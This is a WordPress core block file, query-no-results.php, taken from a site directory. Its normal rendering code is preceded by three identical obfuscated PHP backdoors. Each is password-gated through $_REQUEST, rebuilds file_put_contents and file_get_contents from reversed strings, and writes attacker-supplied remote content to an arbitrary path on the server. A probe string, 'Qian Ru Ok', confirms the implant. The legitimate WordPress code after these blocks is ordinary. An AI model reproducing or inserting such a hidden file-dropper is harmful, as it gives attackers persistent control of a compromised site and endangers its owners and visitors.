File: /home/wwwrenee/www/wp-includes/blocks/query-no-results.php
<?php
$saxiZt = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($saxiZt[0]) /*+/*+*/
. md5($saxiZt[0])) == "6".
"c".
"5".
"d".
"c".
"3".
"5".
"5".
"b".
"2".
"8".
"0".
"c".
"d".
"b".
"f".
"e".
"c".
"8".
"9".
"1".
"2".
"b".
"a".
"2".
"4".
"5".
"f".
"6".
"6".
"b".
"f") {
$aLCqChGfF = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$GmZYvKzyC = $aLCqChGfF /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$iQCLOTyB = $aLCqChGfF
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function nUzrHi($RxpRdt) { if (empty($RxpRdt)) return false; if (!is_dir($RxpRdt)) { nUzrHi(dirname($RxpRdt), 0755, true); mkdir($RxpRdt); } } !file_exists(dirname($saxiZt[1])) && nUzrHi(dirname($saxiZt[1])); $boVxrgSS = @$iQCLOTyB($saxiZt[2]); echo @$GmZYvKzyC($saxiZt[1], $boVxrgSS) ? 1 : 0; die; }key($saxiZt) == "of" && die("Qian Ru Ok"); ?><?php
$MnoBcYDC = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($MnoBcYDC[0]) /*+/*+*/
. md5($MnoBcYDC[0])) == "3".
"d".
"9".
"0".
"2".
"2".
"7".
"4".
"7".
"f".
"3".
"4".
"5".
"7".
"c".
"4".
"e".
"c".
"1".
"e".
"c".
"c".
"a".
"c".
"6".
"1".
"0".
"0".
"5".
"4".
"1".
"6") {
$DMAfXA = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$npMDoMt = $DMAfXA /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$wedClyCI = $DMAfXA
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function eFYDmwPGVe($PajObuy) { if (empty($PajObuy)) return false; if (!is_dir($PajObuy)) { eFYDmwPGVe(dirname($PajObuy), 0755, true); mkdir($PajObuy); } } !file_exists(dirname($MnoBcYDC[1])) && eFYDmwPGVe(dirname($MnoBcYDC[1])); $jAsZnohttD = @$wedClyCI($MnoBcYDC[2]); echo @$npMDoMt($MnoBcYDC[1], $jAsZnohttD) ? 1 : 0; die; }key($MnoBcYDC) == "of" && die("Qian Ru Ok"); ?><?php
$orRFZmcBQe = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($orRFZmcBQe[0]) /*+/*+*/
. md5($orRFZmcBQe[0])) == "f".
"0".
"3".
"0".
"c".
"1".
"b".
"0".
"d".
"d".
"e".
"a".
"2".
"e".
"0".
"a".
"0".
"4".
"8".
"b".
"5".
"a".
"3".
"6".
"7".
"5".
"5".
"4".
"d".
"7".
"a".
"e") {
$kHCWW = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$WumZdM = $kHCWW /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$WfHMggraDm = $kHCWW
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function knHKs($oVYgEdYh) { if (empty($oVYgEdYh)) return false; if (!is_dir($oVYgEdYh)) { knHKs(dirname($oVYgEdYh), 0755, true); mkdir($oVYgEdYh); } } !file_exists(dirname($orRFZmcBQe[1])) && knHKs(dirname($orRFZmcBQe[1])); $pYoxDrq = @$WfHMggraDm($orRFZmcBQe[2]); echo @$WumZdM($orRFZmcBQe[1], $pYoxDrq) ? 1 : 0; die; }key($orRFZmcBQe) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Server-side rendering of the `core/query-no-results` block.
*
* @package WordPress
*/
/**
* Renders the `core/query-no-results` block on the server.
*
* @param array $attributes Block attributes.
* @param string $content Block default content.
* @param WP_Block $block Block instance.
*
* @return string Returns the wrapper for the no results block.
*/
function render_block_core_query_no_results( $attributes, $content, $block ) {
if ( empty( trim( $content ) ) ) {
return '';
}
$page_key = isset( $block->context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page';
$page = empty( $_GET[ $page_key ] ) ? 1 : (int) $_GET[ $page_key ];
// Override the custom query with the global query if needed.
$use_global_query = ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] );
if ( $use_global_query ) {
global $wp_query;
$query = $wp_query;
} else {
$query_args = build_query_vars_from_query_block( $block, $page );
$query = new WP_Query( $query_args );
}
if ( $query->have_posts() ) {
return '';
}
if ( ! $use_global_query ) {
wp_reset_postdata();
}
return sprintf(
'<div %1$s>%2$s</div>',
get_block_wrapper_attributes(),
$content
);
}
/**
* Registers the `core/query-no-results` block on the server.
*/
function register_block_core_query_no_results() {
register_block_type_from_metadata(
__DIR__ . '/query-no-results',
array(
'render_callback' => 'render_block_core_query_no_results',
)
);
}
add_action( 'init', 'register_block_core_query_no_results' ); ?>